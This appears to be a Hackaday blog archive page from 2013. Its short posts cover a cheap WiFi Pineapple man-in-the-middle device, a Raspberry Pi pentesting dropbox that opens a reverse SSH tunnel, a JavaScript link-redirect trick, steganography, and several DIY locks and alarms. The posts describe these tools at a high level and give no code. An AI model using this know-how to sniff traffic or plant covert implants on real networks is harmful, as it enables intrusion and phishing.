Wifi Pineapple Project Uses Updated Hardware For Man-in-the-middle Attacks

April 29, 2013 by Mike Szczys 38 Comments

We’ve seen this small, cheap, and powerful WiFi router before. But this time it’s up to no good. [Andy] used a TP-Link WR703N to build an upgraded WiFi Pineapple hacking tool.

A WiFi Pineapple is a device spawned years ago by the Hak5 team (here’s a clip showing off the device). It uses a WiFi router that will answer to any SSID request. Basically if your computer or smart phone has an AP SSID saved and broadcasts a request to connect the pineapple will pretend to be that device and start the handshake. This provides the chance to sniff all the data passing through in a classic man-in-the-middle attack.

[Andy] is recreating the device but at a rock bottom price. He picked up this router for about $20 and added an $8 USB drive to it. The only other thing you would need is a power source and a way to hide the hardware. The code used in the Hak5 version is available for download and that’s what he worked on after flashing OpenWrt to the device.

[Thanks Midnite]

Hackerspace Security System Brings RFID, Video Feedback, And Automatic Doors

April 17, 2013 by Mike Szczys 38 Comments

rfid-hackerspace-door-lock

[Will] has been hard at work on a replacement system for his Hackerspace’s RFID door lock. The original is now several years old and he’s decided to upgrade to a much more powerful processor, adding some bells and whistles along the way.

The control box seen above is the exterior component of the system. It’s a telephone service box like you’d find on the back of most houses in the US. They had a few of these lying around and they are a perfect choice because… well… they’re meant to be locking enclosures that brave the elements. [Will] made the jump from an Arduino which has run the locks for the last three years to a Raspberry Pi board. This gives him a lot of extra power to work with and he took advantage of that by adding a vehicle backup LCD screen for visual feedback. You can see it giving the ‘Access Granted’ message he used during testing but the demo video after the break shows that they plan to do some image scripting to display a head shot of the RFID tag owner whenever a tag is read.

There are several other features included as well. The system Tweets whenever a tag is read, helping the members keep tabs on who is hanging out at the space right now. It also patches into a sliding door which one of the members automated using a garage door opener motor.

Continue reading “Hackerspace Security System Brings RFID, Video Feedback, And Automatic Doors” →

Combo Lock Uses Relays And Logic Gates

April 8, 2013 by Mike Szczys 22 Comments

logic-combo-lock

Here’s a really fascinating circuit that implements a combination lock using relays and logic gates. Even with the schematic and written explanation of how it works we’re still left somewhat in the dark. We’ll either pull out some paper and do it by hand this weekend, or build it chunk by chunk in a simulator like Atanua. Either way, the project sparked our interest enough that we want to get elbow deep into its inner workings.

From the description we know that it uses a combination of CD4017, CD4030, CD4072, and CD4081 chips. You’re probably familiar with the 4017 which is a decade counter popular in a lot of project. The other chips provide XOR, OR, and AND gates respectively. The relays were chosen for two purposes. One of them activates when a correct combination has been entered, effectively serving as the output for the combo lock. The other two are for activating the clock and affecting a reset if the wrong combination is entered.

It makes us wonder if this would be incredibly simple to brute force the combination by listening for sound of the reset relay activating? It’s hard to tell from the video after the break if you can discern a wrong digit from a right once just based on sound.

Continue reading “Combo Lock Uses Relays And Logic Gates” →

Home Security Hardware Makes You The Monitoring Service

April 4, 2013 by Mike Szczys 16 Comments

diy-home-security

[Nick] and [Simon] both have home security systems with a monitoring service who will call whenever an alarm is tripped. For [Simon] this ends up happening a lot and he wanted to change the circumstances that would trigger a call. Because of company policy the service is inflexible, so he and [Nick] went to work cutting them out of the loop. What they came up with is this custom electronics board which monitors the security system and calls or texts them accordingly.

They started with the self-monitoring alarm system design we looked at back in September. This led to the inclusion of the SIM900 GSM modem, which is a really cheap way to get your device connected to the cellular network. It also uses a DTMF touch tone decoder to emulate the phone line to keep the security system happy. [Simon] highlights several changes he made to the design, as well as the reasons for them. One idea he has for a possible revision is to do away with the MT8870 chip which handles the touch tones. He thinks it may be possible to use the SIM900’s DTMF features to do that work instead.

Images Carrying An Encrypted Data Payload

March 31, 2013 by Mike Szczys 28 Comments

encrypted-data-image

This is a tidy looking banner image. But according to [Ian] it contains 52KB of source code. You can’t just read out all of that data. Well, you can but it will be gibberish. Before hiding the bits in plain sight he encrypted them with two different keys.

He’s using AES-256 encryption to keep his data away from prying eyes. But if that wasn’t enough, he also wrote a PHP program to hide the bits in a PNG image. Not just any picture will do (otherwise your eye will be able to see something’s awry). The post linked above focuses mainly on how to choose an image that will hide your data most easily. We asked him if he would share his techniques for actually merging the encrypted file with the picture and he delivered. Head on over to his repository if you want to take a look at the generator code.

Rogue Pi: A RPi Pentesting Dropbox

March 24, 2013 by Eric Evenchick 4 Comments

A pentesting dropbox is used to allow a pentester to remotely access and audit a network. The device is dropped onto a network, and then sets up a connection which allows remote access. As a final project, [Kalen] built the Rogue Pi, a pentesting dropbox based on the Raspberry Pi.

The Rogue Pi has a few features that make it helpful for pentesting. First off, it has a power on test that verifies that the installation onto the target network was successful. Since the install of a dropbox needs to be inconspicuous, this helps with getting the device setup without being detected. A LCD allows the user to see if the installation was successful without an additional computer or external display.

Once powered on, the device creates a reverse SSH tunnel, which provides remote access to the device. Using a reverse tunnel allows the device to get around the network’s firewall. Aircrack-ng has been included on the device to allow for wireless attacks, and a hidden SSID allows for wireless access if the wired network has issues. There is a long list of pentesting tools that have been built to run on the Pi.

Check out a video demonstration of the dropbox after the break.

Continue reading “Rogue Pi: A RPi Pentesting Dropbox” →

HTML Link Tag Hack Sends You To The Wrong Place

March 23, 2013 by Mike Szczys 16 Comments

hacking-html-a-tag

We consider ourselves fairly cautions Internet warriors. We know when to watch out for malicious links and tread lightly during those times. But this hack will still bite even the most cautions of link followers. It’s a hack that changes where a link is sending you after you click on it.

The concept is driven home right away by a link in the post which lists PayPal as the target when you hover over it with your mouse. Clicking on it will give you a warning that it could have been a malicious page you were redirected to. Of course the address line of the page shows that you were sent somewhere else, but it’s still an interesting issue. The hack is accomplished with just a few lines of JavaScript. In fact, the original example was 100 characters but a revision boils that down to just 67.

So who’s vulnerable to this kind of thing? It sounds like everyone that’s not using the Opera browser, which has been patched against the exploit. There are also some updates at the bottom of the post which mention that Firefox has been notified about it and Chrome is working on a patch.

[via Reddit]